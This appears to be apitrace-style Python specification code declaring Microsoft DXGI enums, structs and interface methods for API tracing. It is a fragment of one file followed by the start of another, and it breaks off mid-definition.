IDXGIAdapter4 = Interface('IDXGIAdapter4', IDXGIAdapter3)
IDXGIOutput6 = Interface('IDXGIOutput6', IDXGIOutput5)
IDXGIAdapter4.methods += [
StdMethod(HRESULT, 'GetDesc3', [Out(Pointer(DXGI_ADAPTER_DESC3), 'pDesc')], sideeffects=False),
]
IDXGIOutput6.methods += [
StdMethod(HRESULT, 'GetDesc1', [Out(Pointer(DXGI_OUTPUT_DESC1), 'pDesc')], sideeffects=False),
StdMethod(HRESULT, 'CheckHardwareCompositionSupport', [Out(Pointer(DXGI_HARDWARE_COMPOSITION_SUPPORT_FLAGS), 'pFlags')], sideeffects=False),
]
IDXGIFactory6.methods += [
StdMethod(HRESULT, 'EnumAdapterByGpuPreference', [(UINT, 'Adapter'), (DXGI_GPU_PREFERENCE, 'GpuPreference'), (REFIID, 'riid'), Out(Pointer(ObjPointer(Void)), 'ppvAdapter')]),
]
dxgi.addInterfaces([
IDXGIFactory6,
IDXGIAdapter4,
IDXGIOutput6,
])
dxgi.addFunctions([
StdFunction(HRESULT, "DXGIDeclareAdapterRemovalSupport", [], sideeffects=False),
])
| ##########################################################################
#
# Copyright 2014 VMware, Inc
# Copyright 2011 <NAME>
# All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
##########################################################################/
from .winapi import *
DXGI_FORMAT = Enum("DXGI_FORMAT", [
"DXGI_FORMAT_UNKNOWN",
"DXGI_FORMAT_R32G32B32A32_TYPELESS",
"DXGI_FORMAT_R32G32B32A32_FLOAT",
"DXGI_FORMAT_R32G32B32A32_UINT",
"DXGI_FORMAT_R32G32B32A32_SINT",
"DXGI_FORMAT_R32G32B32_TYPELESS",
"DXGI_FORMAT_R32G32B32_FLOAT",
"DXGI_FORMAT_R32G32B32_UINT",
"DXGI_FORMAT_R32G32B32_SINT",
"DXGI_FORMAT_R16G16B16A16_TYPELESS",
"DXGI_FORMAT_R16G16B16A16_FLOAT",
"DXGI_FORMAT_R16G16B16A16_UNORM",
"DXGI_FORMAT_R16G16B16A16_UINT",
"DXGI_FORMAT_R16G16B16A16_SNORM",
"DXGI_FORMAT_R16G16B16A16_SINT",
"DXGI_FORMAT_R32G32_TYPELESS",
"DXGI_FORMAT_R32G32_FLOAT",
"DXGI_FORMAT_R32G32_UINT",
"DXGI_FORMAT_R32G32_SINT",
"DXGI_FORMAT_R32G8X24_TYPELESS",
"DXGI_FORMAT_D32_FLOAT_S8X24_UINT",
"DXGI_FORMAT_R32_FLOAT_X8X24_TYPELESS",
"DXGI_FORMAT_X32_TYPELESS_G8X24_UINT",
"DXGI_FORMAT_R10G10B10A2_TYPELESS",
"DXGI_FORMAT_R10G10B10A2_UNORM",
"DXGI_FORMAT_R10G10B10A2_UINT",
"DXGI_FORMAT_R11G11B10_FLOAT",
"DXGI_FORMAT_R8G8B8A8_TYPELESS",
"DXGI_FORMAT_R8G8B8A8_UNORM",
"DXGI_FORMAT_R8G8B8A8_UNORM_SRGB",
"DXGI_FORMAT_R8G8B8A8_UINT",
"DXGI_FORMAT_R8G8B8A8_SNORM",
"DXGI_FORMAT_R8G8B8A8_SINT",
"DXGI_FORMAT_R16G16_TYPELESS",
"DXGI_FORMAT_R16G16_FLOAT",
"DXGI_FORMAT_R16G16_UNORM",
"DXGI_FORMAT_R16G16_UINT",
"DXGI_FORMAT_R16G16_SNORM",
"DXGI_FORMAT_R16G16_SINT",
"DXGI_FORMAT_R32_TYPELESS",
"DXGI_FORMAT_D32_FLOAT",
"DXGI_FORMAT_R32_FLOAT",
"DXGI_FORMAT_R32_UINT",
"DXGI_FORMAT_R32_SINT",
"DXGI_FORMAT_R24G8_TYPELESS",
"DXGI_FORMAT_D24_UNORM_S8_UINT",
"DXGI_FORMAT_R24_UNORM_X8_TYPELESS",
"DXGI_FORMAT_X24_TYPELESS_G8_UINT",
"DXGI_FORMAT_R8G8_TYPELESS",
"DXGI_FORMAT_R8G8_UNORM",
"DXGI_FORMAT_R8G8_UINT",
"DXGI_FORMAT_R8G8_SNORM",
"DXGI_FORMAT_R8G8_SINT",
"DXGI_FORMAT_R16_TYPELESS",
"DXGI_FORMAT_R16_FLOAT",
"DXGI_FORMAT_D16_UNORM",
"DXGI_FORMAT_R16_UNORM",
"DXGI_FORMAT_R16_UINT",
"DXGI_FORMAT_R16_SNORM",
"DXGI_FORMAT_R16_SINT",
"DXGI_FORMAT_R8_TYPELESS",
"DXGI_FORMAT_R8_UNORM",
"DXGI_FORMAT_R8_UINT",
"DXGI_FORMAT_R8_SNORM",
"DXGI_FORMAT_R8_SINT",
"DXGI_FORMAT_A8_UNORM",
"DXGI_FORMAT_R1_UNORM",
"DXGI_FORMAT_R9G9B9E5_SHAREDEXP",
"DXGI_FORMAT_R8G8_B8G8_UNORM",
"DXGI_FORMAT_G8R8_G8B8_UNORM",
"DXGI_FORMAT_BC1_TYPELESS",
"DXGI_FORMAT_BC1_UNORM",
"DXGI_FORMAT_BC1_UNORM_SRGB",
"DXGI_FORMAT_BC2_TYPELESS",
"DXGI_FORMAT_BC2_UNORM",
"DXGI_FORMAT_BC2_UNORM_SRGB",
"DXGI_FORMAT_BC3_TYPELESS",
"DXGI_FORMAT_BC3_UNORM",
"DXGI_FORMAT_BC3_UNORM_SRGB",
"DXGI_FORMAT_BC4_TYPELESS",
"DXGI_FORMAT_BC4_UNORM",
"DXGI_FORMAT_BC4_SNORM",
"DXGI_FORMAT_BC5_TYPELESS",
"DXGI_FORMAT_BC5_UNORM",
"DXGI_FORMAT_BC5_SNORM",
"DXGI_FORMAT_B5G6R5_UNORM",
"DXGI_FORMAT_B5G5R5A1_UNORM",
"DXGI_FORMAT_B8G8R8A8_UNORM",
"DXGI_FORMAT_B8G8R8X8_UNORM",
"DXGI_FORMAT_R10G10B10_XR_BIAS_A2_UNORM",
"DXGI_FORMAT_B8G8R8A8_TYPELESS",
"DXGI_FORMAT_B8G8R8A8_UNORM_SRGB",
"DXGI_FORMAT_B8G8R8X8_TYPELESS",
"DXGI_FORMAT_B8G8R8X8_UNORM_SRGB",
"DXGI_FORMAT_BC6H_TYPELESS",
"DXGI_FORMAT_BC6H_UF16",
"DXGI_FORMAT_BC6H_SF16",
"DXGI_FORMAT_BC7_TYPELESS",
"DXGI_FORMAT_BC7_UNORM",
"DXGI_FORMAT_BC7_UNORM_SRGB",
"DXGI_FORMAT_AYUV",
"DXGI_FORMAT_Y410",
"DXGI_FORMAT_Y416",
"DXGI_FORMAT_NV12",
"DXGI_FORMAT_P010",
"DXGI_FORMAT_P016",
"DXGI_FORMAT_420_OPAQUE",
"DXGI_FORMAT_YUY2",
"DXGI_FORMAT_Y210",
"DXGI_FORMAT_Y216",
"DXGI_FORMAT_NV11",
"DXGI_FORMAT_AI44",
"DXGI_FORMAT_IA44",
"DXGI_FORMAT_P8",
"DXGI_FORMAT_A8P8",
"DXGI_FORMAT_B4G4R4A4_UNORM",
])
HRESULT = MAKE_HRESULT([
"DXGI_STATUS_OCCLUDED",
"DXGI_STATUS_CLIPPED",
"DXGI_STATUS_NO_REDIRECTION",
"DXGI_STATUS_NO_DESKTOP_ACCESS",
"DXGI_STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_STATUS_MODE_CHANGED",
"DXGI_STATUS_MODE_CHANGE_IN_PROGRESS",
"DXGI_ERROR_INVALID_CALL",
"DXGI_ERROR_NOT_FOUND",
"DXGI_ERROR_MORE_DATA",
"DXGI_ERROR_UNSUPPORTED",
"DXGI_ERROR_DEVICE_REMOVED",
"DXGI_ERROR_DEVICE_HUNG",
"DXGI_ERROR_DEVICE_RESET",
"DXGI_ERROR_WAS_STILL_DRAWING",
"DXGI_ERROR_FRAME_STATISTICS_DISJOINT",
"DXGI_ERROR_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_ERROR_DRIVER_INTERNAL_ERROR",
"DXGI_ERROR_NONEXCLUSIVE",
"DXGI_ERROR_NOT_CURRENTLY_AVAILABLE",
"DXGI_ERROR_REMOTE_CLIENT_DISCONNECTED",
"DXGI_ERROR_REMOTE_OUTOFMEMORY",
# IDXGIKeyedMutex::AcquireSync
"WAIT_ABANDONED",
"WAIT_TIMEOUT",
])
DXGI_RGB = Struct("DXGI_RGB", [
(Float, "Red"),
(Float, "Green"),
(Float, "Blue"),
])
DXGI_GAMMA_CONTROL = Struct("DXGI_GAMMA_CONTROL", [
(DXGI_RGB, "Scale"),
(DXGI_RGB, "Offset"),
(Array(DXGI_RGB, 1025), "GammaCurve"),
])
DXGI_GAMMA_CONTROL_CAPABILITIES = Struct("DXGI_GAMMA_CONTROL_CAPABILITIES", [
(BOOL, "ScaleAndOffsetSupported"),
(Float, "MaxConvertedValue"),
(Float, "MinConvertedValue"),
(UINT, "NumGammaControlPoints"),
(Array(Float, "{self}.NumGammaControlPoints"), "ControlPointPositions"),
])
DXGI_RATIONAL = Struct("DXGI_RATIONAL", [
(UINT, "Numerator"),
(UINT, "Denominator"),
])
DXGI_MODE_SCANLINE_ORDER = Enum("DXGI_MODE_SCANLINE_ORDER", [
"DXGI_MODE_SCANLINE_ORDER_UNSPECIFIED",
"DXGI_MODE_SCANLINE_ORDER_PROGRESSIVE",
"DXGI_MODE_SCANLINE_ORDER_UPPER_FIELD_FIRST",
"DXGI_MODE_SCANLINE_ORDER_LOWER_FIELD_FIRST",
])
DXGI_MODE_SCALING = Enum("DXGI_MODE_SCALING", [
"DXGI_MODE_SCALING_UNSPECIFIED",
"DXGI_MODE_SCALING_CENTERED",
"DXGI_MODE_SCALING_STRETCHED",
])
DXGI_MODE_ROTATION = Enum("DXGI_MODE_ROTATION", [
"DXGI_MODE_ROTATION_UNSPECIFIED",
"DXGI_MODE_ROTATION_IDENTITY",
"DXGI_MODE_ROTATION_ROTATE90",
"DXGI_MODE_ROTATION_ROTATE180",
"DXGI_MODE_ROTATION_ROTATE270",
])
DXGI_MODE_DESC = Struct("DXGI_MODE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
])
DXGI_QUALITY_LEVEL = FakeEnum(UINT, [
"DXGI_STANDARD_MULTISAMPLE_QUALITY_PATTERN",
"DXGI_CENTER_MULTISAMPLE_QUALITY_PATTERN",
])
DXGI_SAMPLE_DESC = Struct("DXGI_SAMPLE_DESC", [
(UINT, "Count"),
(DXGI_QUALITY_LEVEL, "Quality"),
])
DXGI_RGBA = Struct("DXGI_RGBA", [
(Float, "r"),
(Float, "g"),
(Float, "b"),
(Float, "a"),
])
IDXGIObject = Interface("IDXGIObject", IUnknown)
IDXGIDeviceSubObject = Interface("IDXGIDeviceSubObject", IDXGIObject)
IDXGIResource = Interface("IDXGIResource", IDXGIDeviceSubObject)
IDXGIKeyedMutex = Interface("IDXGIKeyedMutex", IDXGIDeviceSubObject)
IDXGISurface = Interface("IDXGISurface", IDXGIDeviceSubObject)
IDXGISurface1 = Interface("IDXGISurface1", IDXGISurface)
IDXGIAdapter = Interface("IDXGIAdapter", IDXGIObject)
IDXGIOutput = Interface("IDXGIOutput", IDXGIObject)
IDXGISwapChain = Interface("IDXGISwapChain", IDXGIDeviceSubObject)
IDXGIFactory = Interface("IDXGIFactory", IDXGIObject)
IDXGIDevice = Interface("IDXGIDevice", IDXGIObject)
IDXGIFactory1 = Interface("IDXGIFactory1", IDXGIFactory)
IDXGIAdapter1 = Interface("IDXGIAdapter1", IDXGIAdapter)
IDXGIDevice1 = Interface("IDXGIDevice1", IDXGIDevice)
DXGI_USAGE = Flags(UINT, [
"DXGI_CPU_ACCESS_NONE", # 0
"DXGI_CPU_ACCESS_SCRATCH", # 3
"DXGI_CPU_ACCESS_DYNAMIC", # 1
"DXGI_CPU_ACCESS_READ_WRITE", # 2
"DXGI_USAGE_SHADER_INPUT",
"DXGI_USAGE_RENDER_TARGET_OUTPUT",
"DXGI_USAGE_BACK_BUFFER",
"DXGI_USAGE_SHARED",
"DXGI_USAGE_READ_ONLY",
"DXGI_USAGE_DISCARD_ON_PRESENT",
"DXGI_USAGE_UNORDERED_ACCESS",
])
DXGI_FRAME_STATISTICS = Struct("DXGI_FRAME_STATISTICS", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
])
DXGI_MAPPED_RECT = Struct("DXGI_MAPPED_RECT", [
(INT, "Pitch"),
(LinearPointer(BYTE, "_MappedSize"), "pBits"),
])
DXGI_ADAPTER_DESC = Struct("DXGI_ADAPTER_DESC", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
])
DXGI_OUTPUT_DESC = Struct("DXGI_OUTPUT_DESC", [
(WString, "DeviceName"),
(RECT, "DesktopCoordinates"),
(BOOL, "AttachedToDesktop"),
(DXGI_MODE_ROTATION, "Rotation"),
(HMONITOR, "Monitor"),
])
DXGI_SHARED_RESOURCE = Struct("DXGI_SHARED_RESOURCE", [
(HANDLE, "Handle"),
])
DXGI_RESOURCE_PRIORITY = FakeEnum(UINT, [
"DXGI_RESOURCE_PRIORITY_MINIMUM",
"DXGI_RESOURCE_PRIORITY_LOW",
"DXGI_RESOURCE_PRIORITY_NORMAL",
"DXGI_RESOURCE_PRIORITY_HIGH",
"DXGI_RESOURCE_PRIORITY_MAXIMUM",
])
DXGI_RESIDENCY = Enum("DXGI_RESIDENCY", [
"DXGI_RESIDENCY_FULLY_RESIDENT",
"DXGI_RESIDENCY_RESIDENT_IN_SHARED_MEMORY",
"DXGI_RESIDENCY_EVICTED_TO_DISK",
])
DXGI_SURFACE_DESC = Struct("DXGI_SURFACE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_FORMAT, "Format"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
])
DXGI_SWAP_EFFECT = Enum("DXGI_SWAP_EFFECT", [
"DXGI_SWAP_EFFECT_DISCARD",
"DXGI_SWAP_EFFECT_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_SEQUENTIAL",
"DXGI_SWAP_EFFECT_FLIP_DISCARD",
])
DXGI_SWAP_CHAIN_FLAG = Flags(UINT, [
"DXGI_SWAP_CHAIN_FLAG_NONPREROTATED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_MODE_SWITCH",
"DXGI_SWAP_CHAIN_FLAG_GDI_COMPATIBLE",
"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_CONTENT",
"DXGI_SWAP_CHAIN_FLAG_RESTRICT_SHARED_RESOURCE_DRIVER",
"DXGI_SWAP_CHAIN_FLAG_DISPLAY_ONLY",
"DXGI_SWAP_CHAIN_FLAG_FRAME_LATENCY_WAITABLE_OBJECT",
"DXGI_SWAP_CHAIN_FLAG_FOREGROUND_LAYER",
"DXGI_SWAP_CHAIN_FLAG_FULLSCREEN_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_YUV_VIDEO",
"DXGI_SWAP_CHAIN_FLAG_HW_PROTECTED",
"DXGI_SWAP_CHAIN_FLAG_ALLOW_TEARING",
#"DXGI_SWAP_CHAIN_FLAG_RESTRICTED_TO_ALL_HOLOGRAPHIC_DISPLAYS", # DXGI 1.6
])
DXGI_SWAP_CHAIN_DESC = Struct("DXGI_SWAP_CHAIN_DESC", [
(DXGI_MODE_DESC, "BufferDesc"),
(DXGI_SAMPLE_DESC, "SampleDesc"),
(DXGI_USAGE, "BufferUsage"),
(UINT, "BufferCount"),
(HWND, "OutputWindow"),
(BOOL, "Windowed"),
(DXGI_SWAP_EFFECT, "SwapEffect"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
IDXGIObject.methods += [
StdMethod(HRESULT, "SetPrivateData", [(REFGUID, "Name"), (UINT, "DataSize"), (OpaqueBlob(Const(Void), "DataSize"), "pData")], sideeffects=False),
StdMethod(HRESULT, "SetPrivateDataInterface", [(REFGUID, "Name"), (OpaquePointer(Const(IUnknown)), "pUnknown")], sideeffects=False),
StdMethod(HRESULT, "GetPrivateData", [(REFGUID, "Name"), InOut(Pointer(UINT), "pDataSize"), Out(OpaquePointer(Void), "pData")], sideeffects=False),
StdMethod(HRESULT, "GetParent", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppParent")]),
]
IDXGIDeviceSubObject.methods += [
StdMethod(HRESULT, "GetDevice", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppDevice")]),
]
SHARED_HANDLE = Handle("shared_handle", RAW_HANDLE)
IDXGIResource.methods += [
StdMethod(HRESULT, "GetSharedHandle", [Out(Pointer(SHARED_HANDLE), "pSharedHandle")]),
StdMethod(HRESULT, "GetUsage", [Out(Pointer(DXGI_USAGE), "pUsage")], sideeffects=False),
StdMethod(HRESULT, "SetEvictionPriority", [(DXGI_RESOURCE_PRIORITY, "EvictionPriority")]),
StdMethod(HRESULT, "GetEvictionPriority", [Out(Pointer(DXGI_RESOURCE_PRIORITY), "pEvictionPriority")], sideeffects=False),
]
DWORD_TIMEOUT = FakeEnum(DWORD, [
"INFINITE",
])
IDXGIKeyedMutex.methods += [
StdMethod(HRESULT, "AcquireSync", [(UINT64, "Key"), (DWORD_TIMEOUT, "dwMilliseconds")], sideeffects=False),
StdMethod(HRESULT, "ReleaseSync", [(UINT64, "Key")]),
]
DXGI_MAP = Flags(UINT, [
"DXGI_MAP_READ",
"DXGI_MAP_WRITE",
"DXGI_MAP_DISCARD",
])
IDXGISurface.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SURFACE_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "Map", [Out(Pointer(DXGI_MAPPED_RECT), "pLockedRect"), (DXGI_MAP, "MapFlags")]),
StdMethod(HRESULT, "Unmap", []),
]
IDXGISurface1.methods += [
StdMethod(HRESULT, "GetDC", [(BOOL, "Discard"), Out(Pointer(HDC), "phdc")]),
StdMethod(HRESULT, "ReleaseDC", [(Pointer(RECT), "pDirtyRect")]),
]
IDXGIAdapter.methods += [
StdMethod(HRESULT, "EnumOutputs", [(UINT, "Output"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_ADAPTER_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "CheckInterfaceSupport", [(REFGUID, "InterfaceName"), Out(Pointer(LARGE_INTEGER), "pUMDVersion")], sideeffects=False),
]
DXGI_ENUM_MODES = Flags(UINT, [
"DXGI_ENUM_MODES_INTERLACED",
"DXGI_ENUM_MODES_SCALING",
"DXGI_ENUM_MODES_STEREO",
"DXGI_ENUM_MODES_DISABLED_STEREO",
])
IDXGIOutput.methods += [
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_OUTPUT_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "GetDisplayModeList", [(DXGI_FORMAT, "EnumFormat"), (DXGI_ENUM_MODES, "Flags"), InOut(Pointer(UINT), "pNumModes"), Out(Array(DXGI_MODE_DESC, "*pNumModes"), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "FindClosestMatchingMode", [(Pointer(Const(DXGI_MODE_DESC)), "pModeToMatch"), Out(Pointer(DXGI_MODE_DESC), "pClosestMatch"), (ObjPointer(IUnknown), "pConcernedDevice")], sideeffects=False),
StdMethod(HRESULT, "WaitForVBlank", []),
StdMethod(HRESULT, "TakeOwnership", [(ObjPointer(IUnknown), "pDevice"), (BOOL, "Exclusive")]),
StdMethod(Void, "ReleaseOwnership", []),
StdMethod(HRESULT, "GetGammaControlCapabilities", [Out(Pointer(DXGI_GAMMA_CONTROL_CAPABILITIES), "pGammaCaps")], sideeffects=False),
StdMethod(HRESULT, "SetGammaControl", [(Pointer(Const(DXGI_GAMMA_CONTROL)), "pArray")], sideeffects=False), # Avoid NumGammaControlPoints mismatch
StdMethod(HRESULT, "GetGammaControl", [Out(Pointer(DXGI_GAMMA_CONTROL), "pArray")], sideeffects=False),
StdMethod(HRESULT, "SetDisplaySurface", [(ObjPointer(IDXGISurface), "pScanoutSurface")]),
StdMethod(HRESULT, "GetDisplaySurfaceData", [(ObjPointer(IDXGISurface), "pDestination")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
]
DXGI_PRESENT = Flags(UINT, [
"DXGI_PRESENT_TEST",
"DXGI_PRESENT_DO_NOT_SEQUENCE",
"DXGI_PRESENT_RESTART",
"DXGI_PRESENT_DO_NOT_WAIT",
"DXGI_PRESENT_STEREO_PREFER_RIGHT",
"DXGI_PRESENT_STEREO_TEMPORARY_MONO",
"DXGI_PRESENT_RESTRICT_TO_OUTPUT",
"DXGI_PRESENT_USE_DURATION",
])
IDXGISwapChain.methods += [
StdMethod(HRESULT, "Present", [(UINT, "SyncInterval"), (DXGI_PRESENT, "Flags")]),
StdMethod(HRESULT, "GetBuffer", [(UINT, "Buffer"), (REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppSurface")]),
StdMethod(HRESULT, "SetFullscreenState", [(BOOL, "Fullscreen"), (ObjPointer(IDXGIOutput), "pTarget")]),
StdMethod(HRESULT, "GetFullscreenState", [Out(Pointer(BOOL), "pFullscreen"), Out(Pointer(ObjPointer(IDXGIOutput)), "ppTarget")]),
StdMethod(HRESULT, "GetDesc", [Out(Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc")], sideeffects=False),
StdMethod(HRESULT, "ResizeBuffers", [(UINT, "BufferCount"), (UINT, "Width"), (UINT, "Height"), (DXGI_FORMAT, "NewFormat"), (DXGI_SWAP_CHAIN_FLAG, "SwapChainFlags")]),
StdMethod(HRESULT, "ResizeTarget", [(Pointer(Const(DXGI_MODE_DESC)), "pNewTargetParameters")]),
StdMethod(HRESULT, "GetContainingOutput", [Out(Pointer(ObjPointer(IDXGIOutput)), "ppOutput")]),
StdMethod(HRESULT, "GetFrameStatistics", [Out(Pointer(DXGI_FRAME_STATISTICS), "pStats")], sideeffects=False),
StdMethod(HRESULT, "GetLastPresentCount", [Out(Pointer(UINT), "pLastPresentCount")], sideeffects=False),
]
DXGI_MWA = Flags(UINT, [
"DXGI_MWA_NO_WINDOW_CHANGES",
"DXGI_MWA_NO_ALT_ENTER",
"DXGI_MWA_NO_PRINT_SCREEN",
"DXGI_MWA_VALID",
])
IDXGIFactory.methods += [
StdMethod(HRESULT, "EnumAdapters", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
StdMethod(HRESULT, "MakeWindowAssociation", [(HWND, "WindowHandle"), (DXGI_MWA, "Flags")], sideeffects=False),
StdMethod(HRESULT, "GetWindowAssociation", [Out(Pointer(HWND), "pWindowHandle")], sideeffects=False),
StdMethod(HRESULT, "CreateSwapChain", [(ObjPointer(IUnknown), "pDevice"), (Pointer(DXGI_SWAP_CHAIN_DESC), "pDesc"), Out(Pointer(ObjPointer(IDXGISwapChain)), "ppSwapChain")]),
StdMethod(HRESULT, "CreateSoftwareAdapter", [(HMODULE, "Module"), Out(Pointer(ObjPointer(IDXGIAdapter)), "ppAdapter")]),
]
IDXGIDevice.methods += [
StdMethod(HRESULT, "GetAdapter", [Out(Pointer(ObjPointer(IDXGIAdapter)), "pAdapter")]),
StdMethod(HRESULT, "CreateSurface", [(Pointer(Const(DXGI_SURFACE_DESC)), "pDesc"), (UINT, "NumSurfaces"), (DXGI_USAGE, "Usage"), (Pointer(Const(DXGI_SHARED_RESOURCE)), "pSharedResource"), Out(Pointer(ObjPointer(IDXGISurface)), "ppSurface")]),
StdMethod(HRESULT, "QueryResourceResidency", [(Array(Const(ObjPointer(IUnknown)), "NumResources"), "ppResources"), Out(Array(DXGI_RESIDENCY, "NumResources"), "pResidencyStatus"), (UINT, "NumResources")], sideeffects=False),
StdMethod(HRESULT, "SetGPUThreadPriority", [(INT, "Priority")]),
StdMethod(HRESULT, "GetGPUThreadPriority", [Out(Pointer(INT), "pPriority")], sideeffects=False),
]
DXGI_ADAPTER_FLAG = FakeEnum(UINT, [
"DXGI_ADAPTER_FLAG_NONE",
"DXGI_ADAPTER_FLAG_REMOTE",
"DXGI_ADAPTER_FLAG_SOFTWARE",
])
DXGI_ADAPTER_DESC1 = Struct("DXGI_ADAPTER_DESC1", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
(DXGI_SWAP_CHAIN_FLAG, "Flags"),
])
DXGI_DISPLAY_COLOR_SPACE = Struct("DXGI_DISPLAY_COLOR_SPACE", [
(Array(Array(FLOAT, 8), 2), "PrimaryCoordinates"),
(Array(Array(FLOAT, 16), 2), "WhitePoints"),
])
IDXGIFactory1.methods += [
StdMethod(HRESULT, "EnumAdapters1", [(UINT, "Adapter"), Out(Pointer(ObjPointer(IDXGIAdapter1)), "ppAdapter")]),
StdMethod(BOOL, "IsCurrent", [], sideeffects=False),
]
IDXGIAdapter1.methods += [
StdMethod(HRESULT, "GetDesc1", [Out(Pointer(DXGI_ADAPTER_DESC1), "pDesc")], sideeffects=False),
]
IDXGIDevice1.methods += [
StdMethod(HRESULT, "SetMaximumFrameLatency", [(UINT, "MaxLatency")]),
StdMethod(HRESULT, "GetMaximumFrameLatency", [Out(Pointer(UINT), "pMaxLatency")], sideeffects=False),
]
dxgi = Module('dxgi')
dxgi.addInterfaces([
IDXGIKeyedMutex,
IDXGIFactory1,
IDXGIDevice1,
IDXGIAdapter1,
IDXGIResource,
])
dxgi.addFunctions([
StdFunction(HRESULT, "CreateDXGIFactory", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "CreateDXGIFactory1", [(REFIID, "riid"), Out(Pointer(ObjPointer(Void)), "ppFactory")]),
StdFunction(HRESULT, "DXGID3D10CreateDevice", [(HMODULE, "hModule"), (ObjPointer(IDXGIFactory), "pFactory"), (ObjPointer(IDXGIAdapter), "pAdapter"), (UINT, "Flags"), (OpaquePointer(Const(IUnknown)), "pUnknown"), Out(Pointer(ObjPointer(Void)), "ppDevice")], internal=True),
StdFunction(HRESULT, "DXGID3D10CreateLayeredDevice", [(UINT), (UINT), (UINT), (UINT), (UINT)], internal=True),
StdFunction(SIZE_T, "DXGID3D10GetLayeredDeviceSize", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
StdFunction(HRESULT, "DXGID3D10RegisterLayers", [(OpaqueArray(Const(Void), "NumLayers"), "pLayers"), (UINT, "NumLayers")], internal=True),
])
#
# DXGI 1.2
#
IDXGIDisplayControl = Interface("IDXGIDisplayControl", IUnknown)
IDXGIDisplayControl.methods += [
StdMethod(BOOL, "IsStereoEnabled", [], sideeffects=False),
StdMethod(Void, "SetStereoEnabled", [(BOOL, "enabled")]),
]
DXGI_OUTDUPL_MOVE_RECT = Struct("DXGI_OUTDUPL_MOVE_RECT", [
(POINT, "SourcePoint"),
(RECT, "DestinationRect"),
])
DXGI_OUTDUPL_DESC = Struct("DXGI_OUTDUPL_DESC", [
(DXGI_MODE_DESC, "ModeDesc"),
(DXGI_MODE_ROTATION, "Rotation"),
(BOOL, "DesktopImageInSystemMemory"),
])
DXGI_OUTDUPL_POINTER_POSITION = Struct("DXGI_OUTDUPL_POINTER_POSITION", [
(POINT, "Position"),
(BOOL, "Visible"),
])
DXGI_OUTDUPL_POINTER_SHAPE_TYPE = Enum("DXGI_OUTDUPL_POINTER_SHAPE_TYPE", [
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MONOCHROME",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_COLOR",
"DXGI_OUTDUPL_POINTER_SHAPE_TYPE_MASKED_COLOR",
])
DXGI_OUTDUPL_POINTER_SHAPE_INFO = Struct("DXGI_OUTDUPL_POINTER_SHAPE_INFO", [
(UINT, "Type"),
(UINT, "Width"),
(UINT, "Height"),
(UINT, "Pitch"),
(POINT, "HotSpot"),
])
DXGI_OUTDUPL_FRAME_INFO = Struct("DXGI_OUTDUPL_FRAME_INFO", [
(LARGE_INTEGER, "LastPresentTime"),
(LARGE_INTEGER, "LastMouseUpdateTime"),
(UINT, "AccumulatedFrames"),
(BOOL, "RectsCoalesced"),
